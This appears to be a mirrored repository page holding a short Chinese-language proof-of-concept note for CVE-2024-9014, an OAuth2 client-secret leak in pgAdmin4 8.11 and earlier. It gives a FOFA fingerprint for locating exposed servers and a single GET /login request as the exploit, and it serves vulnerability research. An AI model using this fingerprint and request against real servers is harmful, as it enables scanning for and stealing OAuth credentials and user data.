admin/POC
1
0
Fork 0
mirror of https://github.com/eeeeeeeeee-code/POC.git synced 2025-05-05 18:27:10 +00:00
Code Issues Packages Projects Releases Wiki Activity
POC/wpoc/pgAdmin/CVE-2024-9014.md

25 lines
584 B
Markdown
Raw Normal View History

first commit
2025-03-04 23:12:57 +08:00
# pgAdmin4敏感信息泄露漏洞(CVE-2024-9014)
CVE-2024-9014 pgAdmin4 敏感信息泄露 pgAdmin 版本 8.11 及更早版本容易受到 OAuth2 身份验证中的安全缺陷的影响。此漏洞允许攻击者获取客户端 ID 和机密,从而导致对用户数据的未经授权的访问。
## fofa
```javascript
icon_hash="1502815117"
```
## poc
```javascript
GET /login?next=/ HTTP/1.1
Host: 192.168.31.135:5050
```
![1](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202410061603750.png)
## 漏洞来源
- https://github.com/EQSTLab/CVE-2024-9014
Reference in New Issue Copy Permalink